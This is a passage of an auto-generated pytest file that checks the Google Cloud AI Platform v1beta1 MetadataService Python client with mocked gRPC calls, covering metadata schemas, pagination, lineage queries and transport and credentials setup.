metadata_schema_id="metadata_schema_id_value",
)
@pytest.mark.asyncio
async def test_create_metadata_schema_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.create_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = gca_metadata_schema.MetadataSchema()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
gca_metadata_schema.MetadataSchema()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.create_metadata_schema(
parent="parent_value",
metadata_schema=gca_metadata_schema.MetadataSchema(name="name_value"),
metadata_schema_id="metadata_schema_id_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
arg = args[0].metadata_schema
mock_val = gca_metadata_schema.MetadataSchema(name="name_value")
assert arg == mock_val
arg = args[0].metadata_schema_id
mock_val = "metadata_schema_id_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_create_metadata_schema_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.create_metadata_schema(
metadata_service.CreateMetadataSchemaRequest(),
parent="parent_value",
metadata_schema=gca_metadata_schema.MetadataSchema(name="name_value"),
metadata_schema_id="metadata_schema_id_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.GetMetadataSchemaRequest,
dict,
],
)
def test_get_metadata_schema(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_schema.MetadataSchema(
name="name_value",
schema_version="schema_version_value",
schema="schema_value",
schema_type=metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE,
description="description_value",
)
response = client.get_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataSchemaRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_schema.MetadataSchema)
assert response.name == "name_value"
assert response.schema_version == "schema_version_value"
assert response.schema == "schema_value"
assert (
response.schema_type
== metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE
)
assert response.description == "description_value"
def test_get_metadata_schema_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
client.get_metadata_schema()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataSchemaRequest()
@pytest.mark.asyncio
async def test_get_metadata_schema_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.GetMetadataSchemaRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_schema.MetadataSchema(
name="name_value",
schema_version="schema_version_value",
schema="schema_value",
schema_type=metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE,
description="description_value",
)
)
response = await client.get_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.GetMetadataSchemaRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, metadata_schema.MetadataSchema)
assert response.name == "name_value"
assert response.schema_version == "schema_version_value"
assert response.schema == "schema_value"
assert (
response.schema_type
== metadata_schema.MetadataSchema.MetadataSchemaType.ARTIFACT_TYPE
)
assert response.description == "description_value"
@pytest.mark.asyncio
async def test_get_metadata_schema_async_from_dict():
await test_get_metadata_schema_async(request_type=dict)
def test_get_metadata_schema_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetMetadataSchemaRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
call.return_value = metadata_schema.MetadataSchema()
client.get_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_get_metadata_schema_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.GetMetadataSchemaRequest()
request.name = "name_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_schema.MetadataSchema()
)
await client.get_metadata_schema(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"name=name_value",
) in kw["metadata"]
def test_get_metadata_schema_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_schema.MetadataSchema()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.get_metadata_schema(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
def test_get_metadata_schema_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.get_metadata_schema(
metadata_service.GetMetadataSchemaRequest(),
name="name_value",
)
@pytest.mark.asyncio
async def test_get_metadata_schema_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.get_metadata_schema), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_schema.MetadataSchema()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_schema.MetadataSchema()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.get_metadata_schema(
name="name_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].name
mock_val = "name_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_get_metadata_schema_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.get_metadata_schema(
metadata_service.GetMetadataSchemaRequest(),
name="name_value",
)
@pytest.mark.parametrize(
"request_type",
[
metadata_service.ListMetadataSchemasRequest,
dict,
],
)
def test_list_metadata_schemas(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListMetadataSchemasResponse(
next_page_token="next_page_token_value",
)
response = client.list_metadata_schemas(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataSchemasRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListMetadataSchemasPager)
assert response.next_page_token == "next_page_token_value"
def test_list_metadata_schemas_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
client.list_metadata_schemas()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataSchemasRequest()
@pytest.mark.asyncio
async def test_list_metadata_schemas_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.ListMetadataSchemasRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataSchemasResponse(
next_page_token="next_page_token_value",
)
)
response = await client.list_metadata_schemas(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.ListMetadataSchemasRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, pagers.ListMetadataSchemasAsyncPager)
assert response.next_page_token == "next_page_token_value"
@pytest.mark.asyncio
async def test_list_metadata_schemas_async_from_dict():
await test_list_metadata_schemas_async(request_type=dict)
def test_list_metadata_schemas_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListMetadataSchemasRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
call.return_value = metadata_service.ListMetadataSchemasResponse()
client.list_metadata_schemas(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_list_metadata_schemas_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.ListMetadataSchemasRequest()
request.parent = "parent_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataSchemasResponse()
)
await client.list_metadata_schemas(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"parent=parent_value",
) in kw["metadata"]
def test_list_metadata_schemas_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListMetadataSchemasResponse()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.list_metadata_schemas(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
def test_list_metadata_schemas_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.list_metadata_schemas(
metadata_service.ListMetadataSchemasRequest(),
parent="parent_value",
)
@pytest.mark.asyncio
async def test_list_metadata_schemas_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = metadata_service.ListMetadataSchemasResponse()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
metadata_service.ListMetadataSchemasResponse()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.list_metadata_schemas(
parent="parent_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].parent
mock_val = "parent_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_list_metadata_schemas_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.list_metadata_schemas(
metadata_service.ListMetadataSchemasRequest(),
parent="parent_value",
)
def test_list_metadata_schemas_pager(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials,
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
next_page_token="abc",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[],
next_page_token="def",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
),
RuntimeError,
)
metadata = ()
metadata = tuple(metadata) + (
gapic_v1.routing_header.to_grpc_metadata((("parent", ""),)),
)
pager = client.list_metadata_schemas(request={})
assert pager._metadata == metadata
results = list(pager)
assert len(results) == 6
assert all(isinstance(i, metadata_schema.MetadataSchema) for i in results)
def test_list_metadata_schemas_pages(transport_name: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials,
transport=transport_name,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas), "__call__"
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
next_page_token="abc",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[],
next_page_token="def",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
),
RuntimeError,
)
pages = list(client.list_metadata_schemas(request={}).pages)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.asyncio
async def test_list_metadata_schemas_async_pager():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
next_page_token="abc",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[],
next_page_token="def",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
),
RuntimeError,
)
async_pager = await client.list_metadata_schemas(
request={},
)
assert async_pager.next_page_token == "abc"
responses = []
async for response in async_pager: # pragma: no branch
responses.append(response)
assert len(responses) == 6
assert all(isinstance(i, metadata_schema.MetadataSchema) for i in responses)
@pytest.mark.asyncio
async def test_list_metadata_schemas_async_pages():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials,
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.list_metadata_schemas),
"__call__",
new_callable=mock.AsyncMock,
) as call:
# Set the response to a series of pages.
call.side_effect = (
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
next_page_token="abc",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[],
next_page_token="def",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
],
next_page_token="ghi",
),
metadata_service.ListMetadataSchemasResponse(
metadata_schemas=[
metadata_schema.MetadataSchema(),
metadata_schema.MetadataSchema(),
],
),
RuntimeError,
)
pages = []
async for page_ in (
await client.list_metadata_schemas(request={})
).pages: # pragma: no branch
pages.append(page_)
for page_, token in zip(pages, ["abc", "def", "ghi", ""]):
assert page_.raw_page.next_page_token == token
@pytest.mark.parametrize(
"request_type",
[
metadata_service.QueryArtifactLineageSubgraphRequest,
dict,
],
)
def test_query_artifact_lineage_subgraph(request_type, transport: str = "grpc"):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
response = client.query_artifact_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryArtifactLineageSubgraphRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
def test_query_artifact_lineage_subgraph_empty_call():
# This test is a coverage failsafe to make sure that totally empty calls,
# i.e. request == None and no flattened fields passed, work.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport="grpc",
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
client.query_artifact_lineage_subgraph()
call.assert_called()
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryArtifactLineageSubgraphRequest()
@pytest.mark.asyncio
async def test_query_artifact_lineage_subgraph_async(
transport: str = "grpc_asyncio",
request_type=metadata_service.QueryArtifactLineageSubgraphRequest,
):
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# Everything is optional in proto3 as far as the runtime is concerned,
# and we are mocking out the actual API, so just send an empty request.
request = request_type()
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
response = await client.query_artifact_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == metadata_service.QueryArtifactLineageSubgraphRequest()
# Establish that the response is the type that we expect.
assert isinstance(response, lineage_subgraph.LineageSubgraph)
@pytest.mark.asyncio
async def test_query_artifact_lineage_subgraph_async_from_dict():
await test_query_artifact_lineage_subgraph_async(request_type=dict)
def test_query_artifact_lineage_subgraph_field_headers():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryArtifactLineageSubgraphRequest()
request.artifact = "artifact_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
call.return_value = lineage_subgraph.LineageSubgraph()
client.query_artifact_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"artifact=artifact_value",
) in kw["metadata"]
@pytest.mark.asyncio
async def test_query_artifact_lineage_subgraph_field_headers_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Any value that is part of the HTTP/1.1 URI should be sent as
# a field header. Set these to a non-empty value.
request = metadata_service.QueryArtifactLineageSubgraphRequest()
request.artifact = "artifact_value"
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
await client.query_artifact_lineage_subgraph(request)
# Establish that the underlying gRPC stub method was called.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
assert args[0] == request
# Establish that the field header was sent.
_, _, kw = call.mock_calls[0]
assert (
"x-goog-request-params",
"artifact=artifact_value",
) in kw["metadata"]
def test_query_artifact_lineage_subgraph_flattened():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
client.query_artifact_lineage_subgraph(
artifact="artifact_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls) == 1
_, args, _ = call.mock_calls[0]
arg = args[0].artifact
mock_val = "artifact_value"
assert arg == mock_val
def test_query_artifact_lineage_subgraph_flattened_error():
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
client.query_artifact_lineage_subgraph(
metadata_service.QueryArtifactLineageSubgraphRequest(),
artifact="artifact_value",
)
@pytest.mark.asyncio
async def test_query_artifact_lineage_subgraph_flattened_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Mock the actual call within the gRPC stub, and fake the request.
with mock.patch.object(
type(client.transport.query_artifact_lineage_subgraph), "__call__"
) as call:
# Designate an appropriate return value for the call.
call.return_value = lineage_subgraph.LineageSubgraph()
call.return_value = grpc_helpers_async.FakeUnaryUnaryCall(
lineage_subgraph.LineageSubgraph()
)
# Call the method with a truthy value for each flattened field,
# using the keyword arguments to the method.
response = await client.query_artifact_lineage_subgraph(
artifact="artifact_value",
)
# Establish that the underlying call was made with the expected
# request object values.
assert len(call.mock_calls)
_, args, _ = call.mock_calls[0]
arg = args[0].artifact
mock_val = "artifact_value"
assert arg == mock_val
@pytest.mark.asyncio
async def test_query_artifact_lineage_subgraph_flattened_error_async():
client = MetadataServiceAsyncClient(
credentials=ga_credentials.AnonymousCredentials(),
)
# Attempting to call a method with both a request object and flattened
# fields is an error.
with pytest.raises(ValueError):
await client.query_artifact_lineage_subgraph(
metadata_service.QueryArtifactLineageSubgraphRequest(),
artifact="artifact_value",
)
def test_credentials_transport_error():
# It is an error to provide credentials and a transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
transport=transport,
)
# It is an error to provide a credentials file and a transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MetadataServiceClient(
client_options={"credentials_file": "credentials.json"},
transport=transport,
)
# It is an error to provide an api_key and a transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
options = client_options.ClientOptions()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = MetadataServiceClient(
client_options=options,
transport=transport,
)
# It is an error to provide an api_key and a credential.
options = mock.Mock()
options.api_key = "api_key"
with pytest.raises(ValueError):
client = MetadataServiceClient(
client_options=options, credentials=ga_credentials.AnonymousCredentials()
)
# It is an error to provide scopes and a transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
with pytest.raises(ValueError):
client = MetadataServiceClient(
client_options={"scopes": ["1", "2"]},
transport=transport,
)
def test_transport_instance():
# A client may be instantiated with a custom transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
client = MetadataServiceClient(transport=transport)
assert client.transport is transport
def test_transport_get_channel():
# A client may be instantiated with a custom transport instance.
transport = transports.MetadataServiceGrpcTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
transport = transports.MetadataServiceGrpcAsyncIOTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
channel = transport.grpc_channel
assert channel
@pytest.mark.parametrize(
"transport_class",
[
transports.MetadataServiceGrpcTransport,
transports.MetadataServiceGrpcAsyncIOTransport,
],
)
def test_transport_adc(transport_class):
# Test default credentials are used if not provided.
with mock.patch.object(google.auth, "default") as adc:
adc.return_value = (ga_credentials.AnonymousCredentials(), None)
transport_class()
adc.assert_called_once()
@pytest.mark.parametrize(
"transport_name",
[
"grpc",
],
)
def test_transport_kind(transport_name):
transport = MetadataServiceClient.get_transport_class(transport_name)(
credentials=ga_credentials.AnonymousCredentials(),
)
assert transport.kind == transport_name
def test_transport_grpc_default():
# A client should use the gRPC transport by default.
client = MetadataServiceClient(
credentials=ga_credentials.AnonymousCredentials(),
)
assert isinstance(
client.transport,
transports.MetadataServiceGrpcTransport,
)
def test_metadata_service_base_transport_error():
# Passing both a credentials object and credentials_file should raise an error
with pytest.raises(core_exceptions.DuplicateCredentialArgs):
transport = transports.MetadataServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
credentials_file="credentials.json",
)
def test_metadata_service_base_transport():
# Instantiate the base transport.
with mock.patch(
"google.cloud.aiplatform_v1beta1.services.metadata_service.transports.MetadataServiceTransport.__init__"
) as Transport:
Transport.return_value = None
transport = transports.MetadataServiceTransport(
credentials=ga_credentials.AnonymousCredentials(),
)
# Every method on the transport should just blindly
# raise NotImplementedError.
methods = (
"create_metadata_store",
"get_metadata_store",
"list_metadata_stores",
"delete_metadata_store",
"create_artifact",
"get_artifact",
"list_artifacts",
"update_artifact",
"delete_artifact",
"purge_artifacts",
"create_context",
"get_context",
"list_contexts",
"update_context",
"delete_context",
"purge_contexts",
"add_context_artifacts_and_executions",
"add_context_children",
"query_context_lineage_subgraph",
"create_execution",
"get_execution",
"list_executions",
"update_execution",
"delete_execution",
"purge_executions",
"add_execution_events",
"query_execution_inputs_and_outputs",
"create_metadata_schema",
"get_metadata_schema",
"list_metadata_schemas",
"query_artifact_lineage_subgraph",
"set_iam_policy",
"get_iam_policy",
"test_iam_permissions",
"get_location",
"list_locations",
"get_operation",
"wait_operation",
"cancel_operation",
"delete_operation",
"list_operations",
)
for method in methods:
with pytest.raises(NotImplementedError):
getattr(transport, method)(request=object())
with pytest.raises(NotImplementedError):
transport.close()
# Additionally, the LRO client (a property) should
# also raise NotImplementedError
with pytest.raises(NotImplementedError):
transport.operations_client
# Catch all for all remaining methods and properties
remainder = [
"kind",
]
for r in remainder:
with pytest.raises(NotImplementedError):
getattr(transport, r)()
def test_metadata_service_base_transport_with_credentials_file():
# Instantiate the base transport with a credentials file
with mock.patch.object(
google.auth, "load_credentials_from_file", autospec=True
) as load_creds, mock.patch(
"google.cloud.aiplatform_v1beta1.services.metadata_service.transports.MetadataServiceTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
load_creds.return_value = (ga_credentials.AnonymousCredentials(), None)
transport = transports.MetadataServiceTransport(
credentials_file="credentials.json",
quota_project_id="octopus",
)
load_creds.assert_called_once_with(
"credentials.json",
scopes=None,
default_scopes=("https://www.googleapis.com/auth/cloud-platform",),
quota_project_id="octopus",
)
def test_metadata_service_base_transport_with_adc():
# Test the default credentials are used if credentials and credentials_file are None.
with mock.patch.object(google.auth, "default", autospec=True) as adc, mock.patch(
"google.cloud.aiplatform_v1beta1.services.metadata_service.transports.MetadataServiceTransport._prep_wrapped_messages"
) as Transport:
Transport.return_value = None
